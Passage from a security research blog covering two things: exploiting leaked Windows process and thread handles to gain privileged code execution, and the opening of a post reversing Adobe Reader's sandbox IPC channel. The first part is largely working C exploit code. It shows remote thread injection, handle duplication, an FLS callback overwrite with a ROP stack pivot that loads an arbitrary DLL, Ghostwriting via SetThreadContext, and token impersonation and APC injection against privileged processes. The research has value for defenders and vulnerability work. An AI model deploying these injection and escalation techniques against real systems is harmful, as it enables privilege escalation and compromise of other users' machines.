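// hypothetical offset of some ANSI DLL name string inside msvcrt.dll
DWORD dwName = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x41414);
CreateRemoteThread(hPrivProc, NULL, 0,
                   (LPTHREAD_START_ROUTINE)LoadLibraryA,
                   (LPVOID)dwName, 0, NULL);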

PROCESS_DUP_HANDLE

Microsoft’s own documentation on process security and access rights points to this specifically as a sensitive right. Using it, we can simply duplicate our process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address space. As per Ivan Fratric’s JIT bug, it’s as simple as this:

HANDLE hDup = INVALID_HANDLE_VALUE;
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0);

Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.

PROCESS_SET_INFORMATION

Granting this permission allows one to call SetProcessInformation in addition to setting several fields via NtSetInformationProcess. The latter is far more powerful, but many of the PROCESSINFOCLASS fields available are either read only or require additional privileges to actually set (SeDebugPrivilege for ProcessExceptionPort and ProcessInstrumentationCallback (Win7), for example). Process Hacker[15] maintains an up to date definition of this class and its members.

Of the available flags, none were particularly interesting on their own. I needed to add PROCESS_VM_* privileges in order to make any of them usable, and at that point we defeat the purpose.

PROCESS_VM_*

This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two should be self-explanatory and the third allows one to operate on the virtual address space itself, such as changing page protections (VirtualProtectEx) or allocating memory (VirtualAllocEx). I won’t address each permutation of these three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a necessary requirement. While PROCESS_VM_OPERATION allows us to crash the remote process which could open up other flaws, it’s not a generic nor elegant approach. Ditto with PROCESS_VM_READ.

PROCESS_VM_WRITE on its own proved to be a challenge, and I was unable to come up with a generic solution using only this right. At first blush, the entire set of Shatter-like injection strategies documented by Hexacorn[12] seems like it would be perfect. These simply require the remote process to use windows, clipboard registrations, etc. None of these are guaranteed, but chances are one is bound to exist. Unfortunately for us, many of them restrict access across sessions or integrity levels. We can write into the remote process, but we need some way to gain control over execution flow.

In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.

Using NtQuerySystemInformation, for example, we can enumerate all threads inside a remote process regardless of its IL. This grants us a list of SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other things, the address of the TEB. NtQueryInformationProcess allows us to fetch the remote process PEB address. This latter API requires the PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION onto PROCESS_VM_WRITE which gives us the necessary components to pull this off. If someone knows of a way to leak the address of a remote process PEB without it, I’d love to hear.
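
For reference, the PEB half is just NtQueryInformationProcess(ProcessBasicInformation) and reading pbi.PebBaseAddress, as in the FLS post; the TEB leak is a little more involved. A sketch, assuming the phnt/Process Hacker[15] layouts of SYSTEM_PROCESS_INFORMATION and SYSTEM_EXTENDED_THREAD_INFORMATION (the latter carries TebBase) and the NtQuerySystemInformation pointer resolved as in the client above:

#define SystemExtendedProcessInformation ((SYSTEM_INFORMATION_CLASS)57)

SIZE_T GetRemoteTeb(DWORD dwTargetPid)
{
    ULONG len = 0x100000;
    PBYTE buf = (PBYTE)malloc(len);

    while (NtQuerySystemInformation(SystemExtendedProcessInformation, buf,
                                    len, NULL) == STATUS_INFO_LENGTH_MISMATCH)
        buf = (PBYTE)realloc(buf, len *= 2);

    PSYSTEM_PROCESS_INFORMATION spi = (PSYSTEM_PROCESS_INFORMATION)buf;
    for (;;)
    {
        if ((DWORD)(SIZE_T)spi->UniqueProcessId == dwTargetPid)
        {
            // the thread array immediately follows each process entry; grab
            // the first entry (the primary thread, in practice) and its TEB
            PSYSTEM_EXTENDED_THREAD_INFORMATION seti =
                (PSYSTEM_EXTENDED_THREAD_INFORMATION)(spi + 1);
            SIZE_T teb = (SIZE_T)seti->TebBase;
            free(buf);
            return teb;
        }

        if (!spi->NextEntryOffset)
            break;
        spi = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)spi + spi->NextEntryOffset);
    }

    free(buf);
    return 0;
}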

The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.

Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always set up a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions is taken.

With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.

Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].

Gaining control over the callback was a little trickier. A pointer to a _FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an opaque structure. Since we can’t actually read this pointer, we have no simple way of overwriting the pointer. Or do we?

What I ended up doing is overwriting the FlsCallback pointer itself in the PEB, essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a pretty simple structure and really only has one value of importance: the callback pointer.

In addition, as per the FLS article, we also need to take control over ECX/RCX. This will allow us to stack pivot and continue executing our ROP payload. This requires that we update the TEB->FlsData entry which we also are unable to do, since it’s a pointer. Much like FlsCallback, though, I was able to just overwrite this value and craft my own data structure, which also turned out to be pretty simple. The TLS buffer ended up looking like this:

//
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141 
//

There just so happens to be a perfect stack pivot gadget located in kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):

7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
7603c41b c20400          ret     4

Putting this all together, execution results in:

eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400          ret     4
0:000> dd esp l3
7ffdee30  41414141 41414141 41414141

Now we’ve got EIP and a stack pivot. Instead of marking memory and executing some other payload, I took a quick and lazy strategy and simply called LoadLibraryA to load a DLL off disk from an arbitrary location. This works well, is reliable, and even on process exit will execute and block, depending on what you do within the DLL. Here’s the final code to achieve all this:

_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");

LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
    return;

SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;

SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;

//
// construct our TlsSlots payload:
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//

memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;

StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)

NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);

// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);

If all works well you should see attempts to load AAAA.dll off disk when the callback is executed (just close the process). As a note, we’re using NtWriteVirtualMemory here because WriteProcessMemory requires PROCESS_VM_OPERATION which we may not have.

Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ. This gives us visibility into the address space, but we still cannot allocate or map memory into the remote process. Using the above strategy we can rid ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the PEB address out of TEB.

Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION. Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we can now allocate memory and change page permissions. This allows us to more easily use the above strategy, but also perform inline and IAT hooks.

Thread

As with the process handles, there are a handful of access rights we can dismiss immediately:

SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE

Which leaves the following:

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN

THREAD_ALL_ACCESS

There’s quite a lot we can do with this, including everything described in the following thread access rights sections. I personally find the THREAD_DIRECT_IMPERSONATION strategy to be the easiest.

There is another option that is a bit more arcane, but equally viable. Note that this thread access doesn’t give us VM read/write privileges, so there’s no easy to way to β€œwrite” into a thread, since that doesn’t really make sense. What we do have, however, is a series of APIs that sort of grant us that: SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code injection technique dubbed Ghostwriting[6] was released to little fanfare. In it, the author describes a code injection strategy that does not require the typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or even OpenProcess.

While the write-up is lacking in a few departments, it’s quite a clever bit of code. In short, the author abuses the SetThreadContext/GetThreadContext calls in tandem with a set of specific assembly gadgets to write a payload, dword by dword, onto the thread’s stack. Once written, they use NtProtectVirtualMemory to mark the code RWX and redirect code flow to their payload.

For their write gadget, they hunt for a pattern inside NTDLL:

MOV [REG1], REG2
RET

They then locate a JMP $, or jump here, which will operate as an auto lock and infinitely loop. Once we’ve found our two gadgets, we suspend the thread. We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP so the return address is the JMP $, and set REG2 to the jump gadget. Here’s my write function:

void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);

    context.Rsp = StackBase;
    context.Rip = MovAddr;

    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}

The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the appropriate registers. Once those are set, we set our stack base (adjusted from threads RSP) and update RIP to our gadget. The first time we execute this we’ll write our JMP $ gadget to the stack.

They use what they call a thread auto lock to control execution flow (edits mine):

void WaitForThreadAutoLock(HANDLE Thread, CONTEXT *PThreadContext, DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    do
    {
        ResumeThread(Thread);
        Sleep(30); 
        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the β€œsink” gadget has been reached.

Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.
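
From there, writing an entire payload is just a loop over the primitive; a sketch (the target address is hypothetical):

// write a payload qword by qword into the remote process
SIZE_T payload[] = { 0x4141414141414141, 0x4242424242424242 };
for (int i = 0; i < _countof(payload); ++i)
    WriteQword(context, hThread, payload[i], TargetAddr + i * sizeof(SIZE_T));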

I ported the core function of this technique to x64 to demonstrate its viability. Instead of using it to execute an entire payload, I simply execute LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is available on Github[11]. Turning it into something production ready is left as an exercise for the reader ;)

Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve released a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.

THREAD_DIRECT_IMPERSONATION

This differs from THREAD_IMPERSONATE in that it allows the thread token to be impersonated, not simply TO impersonate. Exploiting this is simply a matter of using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7]. Using this we’re able to create a thread totally under our control and impersonate the privileged one:

hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);
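
Here lpRtl is whatever start routine you want the new thread to run under the stolen token, and sqos is a SECURITY_QUALITY_OF_SERVICE requesting impersonation; a sketch:

SECURITY_QUALITY_OF_SERVICE sqos = { 0 };
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
sqos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
sqos.EffectiveOnly = FALSE;

Once NtImpersonateThread returns, resume the suspended thread and do the privileged work from there.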

The hNewThread will now be executing with a SYSTEM token, allowing us to do whatever we need under the privileged impersonation context.

THREAD_IMPERSONATE

Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.

We can use this to force the privileged thread to impersonate us, using the NtImpersonateThread call, which may unlock additional logic bugs in the application. For example, if the service were to create shared resources under a user context for which it would typically be SYSTEM, such as a file, we can gain ownership over that file. If multiple privileged threads access it for information (such as configuration) it could lead to code execution.
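
The direction is simply flipped from the previous primitive; a sketch (sqos as above):

// force the privileged thread to impersonate our unprivileged token
NtImpersonateThread(hThread, GetCurrentThread(), &sqos);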

THREAD_SET_CONTEXT

While this right grants us access to SetThreadContext, it also conveniently allows us to use QueueUserAPC. This is effectively granting us a CreateRemoteThread primitive, with a caveat: for an APC to be processed by the thread, it needs to enter an alertable state. This happens only when a specific set of win32 functions is executed, so it is entirely possible that the thread never becomes alertable.

If we’re working with an uncooperative thread, SetThreadContext comes in handy. Using it, we can force the thread to become alertable via the NtTestAlert function. Of course, we have no ability to call GetThreadContext and will therefore likely lose control of the thread after exploitation.
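
A sketch of the uncooperative case, with the caveats above (the scratch stack value is hypothetical, since CONTEXT_CONTROL also sets RSP and we can’t read the existing context):

// queue the APC; the argument must be an address valid in the target,
// e.g. the cmd.exe string used in the WinExec example earlier
QueueUserAPC((PAPCFUNC)WinExec, hThread, (ULONG_PTR)dwCmd);

// blindly redirect the thread to NtTestAlert to force APC delivery
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_CONTROL;
ctx.Rip = (DWORD64)GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert");
ctx.Rsp = dwScratchStack; // hypothetical RW memory in the target
SetThreadContext(hThread, &ctx);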

In combination with THREAD_GET_CONTEXT, this right would allow us to replicate the Ghostwriting code injection technique discussed in the THREAD_ALL_ACCESS section above.

THREAD_SET_INFORMATION

Needed to set various ThreadInformationClass[9] values on a thread, usually via NtSetInformationThread. After looking through all of these, I did not identify any immediate ways in which we could influence the remote thread. Some of the values are interesting but unusable (ThreadSetTlsArrayAddress, ThreadAttachContainer, etc.) and are either not implemented/removed or require SeDebugPrivilege or similar.

I’m not really sure what would make this a viable candidate either; there’s really not a lot of juicy stuff that can be done via the available functions.

THREAD_SET_LIMITED_INFORMATION

This allows the caller to set a subset of THREAD_INFORMATION_CLASS values, namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask, ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us anywhere near an exploitable primitive.

THREAD_SET_THREAD_TOKEN

Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic method of abusing this right. I can set the thread’s token or modify a few fields (via SetTokenInformation), but this doesn’t grant us much.

Conclusion

I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT

Missing these will require a deeper understanding of your target and some creativity.

Similarly, processes have a specific subset of rights that are directly exploitable:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE

Barring these, more creativity is required.

References

[0] https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1] https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2] https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3] https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4] https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5] https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6] http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7] https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8] https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9] https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10] https://github.com/SafeBreach-Labs/pinjectra
[11] https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12] http://www.hexacorn.com/blog/category/code-injection/
[13] http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14] http://www.nynaeve.net/?p=180
[15] https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98

Digging the Adobe Sandbox - IPC Internals

7 August 2020 at 21:10

This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I'll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.

I've broken this research up into two posts. Maybe more, we'll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.

This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.

Introduction

This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:

2011 - A Castle Made of Sand (Richard Johnson)
2011 - Playing in the Reader X Sandbox (Paul Sabanal and Mark Yason)
2012 - Breeding Sandworms (Zhenhua Liu and Guillaume Lovet)
2013 - When the Broker is Broken (Peter Vreugdenhil)

Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transactions and how they approached fuzzing the sandbox. I'll detail my approach and improvements in part two of this series.

In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on the Javascript side of things for what seems like forever (Abusing Adobe Reader's Javascript APIs) and have done some great work in this area.

After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.

Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader here. I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.

Sandbox Internals Overview

Adobe Reader's sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.

Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It's useful for figuring out variables and function names during reversing, and the source code is well written and full of useful comments, so I recommend pulling it up.

Reader uses the Chromium sandbox (pre Mojo), and I recommend the Chromium sandbox documentation for the specifics there.

These days it's known as the "legacy IPC" and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It's possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.

We'll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget. This function crafts the target process and its restrictions. Some of these are described here in greater detail, but they are as follows:

1. Create restricted token
 - via `CreateRestrictedToken`
 - Low integrity or AppContainer if available
2. Create restricted job object
 - No RW to clipboard
 - No access to user handles in other processes
 - No message broadcasts
 - No global hooks
 - No global atoms table access
 - No changes to display settings
 - No desktop switching/creation
 - No ExitWindows calls
 - No SystemParametersInfo
 - One active process
 - Kill on close/unhandled exception

From here, the policy manager enforces interceptions via the InterceptionManager, which handles hooking and rewiring various Win32 functions from the target process to the broker. According to documentation, this is not for security, but rather:

[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.

From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.

The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:

  1. The target finds a channel in a free state
  2. The target serializes the IPC call parameters to the channel
  3. The target then signals an event object for the channel (ping event)
  4. The target waits until a pong event is signaled

At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:

  1. The broker deserializes the call arguments in the channel
  2. Sanity checks the parameters and the call
  3. Executes the callback
  4. Writes the return structure back to the channel
  5. Signals that the call is completed (pong event)

There are 15 channels available for use, meaning that the broker can service up to 15 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:

From the broker's perspective, a channel can be viewed like so:

In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we'll take a look at these in more technical depth.

IPC Internals

The IPC facilities are established via TargetProcess::Init, which is really what we're most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:

  DWORD shared_mem_size = static_cast<DWORD>(shared_IPC_size +
                                             shared_policy_size);
  shared_section_.Set(::CreateFileMappingW(INVALID_HANDLE_VALUE, NULL,
                                           PAGE_READWRITE | SEC_COMMIT,
                                           0, shared_mem_size, NULL));
  if (!shared_section_.IsValid()) {
    return ::GetLastError();
  }

  DWORD access = FILE_MAP_READ | FILE_MAP_WRITE;
  base::win::ScopedHandle target_shared_section;
  if (!::DuplicateHandle(::GetCurrentProcess(), shared_section_,
                         sandbox_process_info_.process_handle(),
                         target_shared_section.Receive(), access, FALSE, 0)) {
    return ::GetLastError();
  }

  void* shared_memory = ::MapViewOfFile(shared_section_,
                                        FILE_MAP_WRITE|FILE_MAP_READ,
                                        0, 0, 0);

The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn't right. The shared section is actually 0x20000 bytes in modern Reader binaries.

Once the mapping is established and policies copied in, the SharedMemIPCServer is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.

The previous architecture diagram provides an overview of the structures and layout of the section at runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server-side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.
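
Reconstructed from the published sandbox source, the broker-side structure looks roughly like the sketch below; on x86 the field order also lines up with the Context + 24 (dispatcher) and Context + 28 (target_info) dereferences we'll see later in the dispatch code:

struct ServerControl {
  HANDLE ping_event;         // signaled by the target when a request is ready
  HANDLE pong_event;         // signaled by the broker when the answer is ready
  uint32 channel_size;       // size of the channel buffer
  char* channel_buffer;      // broker-side pointer to the channel buffer
  char* shared_base;         // base of the shared memory section
  ChannelControl* channel;   // pointer to the client-visible channel structure
  Dispatcher* dispatcher;    // IPC dispatcher servicing this channel
  ClientInfo target_info;    // information about the connected target process
};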

A ChannelControl is the target process version of a ServerControl; it contains the target's event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.

Let's walk through what an actual request looks like. Making an IPC request requires the target to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:

const size_t kExtendedReturnCount = 8;

union MultiType {
  uint32 unsigned_int;
  void* pointer;
  HANDLE handle;
  ULONG_PTR ulong_ptr;
};

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

struct CrossCallParams {
  uint32 tag_;
  uint32 is_in_out_;
  CrossCallReturn call_return;
  size_t params_count_;
};

I've also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.

There's a great ASCII diagram provided in the sandbox source code that's highly instructive, and I've duplicated it below:

// [ tag                4 bytes]
// [ IsOnOut            4 bytes]
// [ call return       52 bytes]
// [ params count       4 bytes]
// [ parameter 0 type   4 bytes]
// [ parameter 0 offset 4 bytes] ---delta to ---\
// [ parameter 0 size   4 bytes]                |
// [ parameter 1 type   4 bytes]                |
// [ parameter 1 offset 4 bytes] ---------------|--\
// [ parameter 1 size   4 bytes]                |  |
// [ parameter 2 type   4 bytes]                |  |
// [ parameter 2 offset 4 bytes] ----------------------\
// [ parameter 2 size   4 bytes]                |  |   |
// |---------------------------|                |  |   |
// | value 0     (x bytes)     | <--------------/  |   |
// | value 1     (y bytes)     | <-----------------/   |
// |                           |                       |
// | end of buffer             | <---------------------/
// |---------------------------|

A tag is a dword indicating which function we're invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we'll explore that further later on.

Each parameter is then sequentially represented by a ParamInfo structure:

struct ParamInfo {
  ArgType type_;
  ptrdiff_t offset_;
  size_t size_;
};

The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.

Let's look at a call in memory from the target's perspective. Assume the channel buffer is at 0x2a10134:

0:009> dd 2a10000+0x134
02a10134  00000003 00000000 00000000 00000000
02a10144  00000000 00000000 000002cc 00000001
02a10154  00000000 00000000 00000000 00000000
02a10164  00000000 00000000 00000000 00000007
02a10174  00000001 000000a0 00000086 00000002
02a10184  00000128 00000004 00000002 00000130
02a10194  00000004 00000002 00000138 00000004
02a101a4  00000002 00000140 00000004 00000002

0x2a10134 shows we're invoking tag 3, which carries 7 parameters (0x2a10170). The first argument is type 0x1 (we'll describe types later on), is at delta offset 0xa0, and is 0x86 bytes in size. Thus:

0:009> dd 2a10000+0x134+0xa0
02a101d4  003f005c 005c003f 003a0043 0055005c
02a101e4  00650073 00730072 0062005c 0061006a
02a101f4  006a0066 0041005c 00700070 00610044
02a10204  00610074 004c005c 0063006f 006c0061
02a10214  006f004c 005c0077 00640041 0062006f
02a10224  005c0065 00630041 006f0072 00610062
02a10234  005c0074 00430044 0052005c 00610065
02a10244  00650064 004d0072 00730065 00610073
0:009> du 2a10000+0x134+0xa0
02a101d4  "\??\C:\Users\bjaff\AppData\Local"
02a10214  "Low\Adobe\Acrobat\DC\ReaderMessa"
02a10254  "ges"

This shows the delta of the parameter data and, based on the parameter type, we know it's a unicode string.
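
Putting the layout together, resolving a parameter from a channel buffer takes just a few lines. This is an illustrative helper of my own, not sandbox code; buf is assumed to point at the start of the CrossCallParams:

struct ParamRecord {
  DWORD type;
  DWORD offset;
  DWORD size;
};

BYTE* GetParam(BYTE* buf, DWORD index, ParamRecord* rec)
{
  // records begin after tag (4), is_in_out (4), call return (52), count (4)
  ParamRecord* records = (ParamRecord*)(buf + 0x40);
  *rec = records[index];
  return buf + rec->offset;  // offset is a delta from the buffer start
}

Against the dump above, GetParam(buf, 0, &rec) yields type 1, size 0x86, and a pointer to the unicode string at buf+0xa0.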

With this information, we can craft a buffer targeting IPC tag 3 and move on to sending it. To do this, we require the IPCControl structure. This is a simple structure defined at the start of the IPC shared memory section:

struct IPCControl {
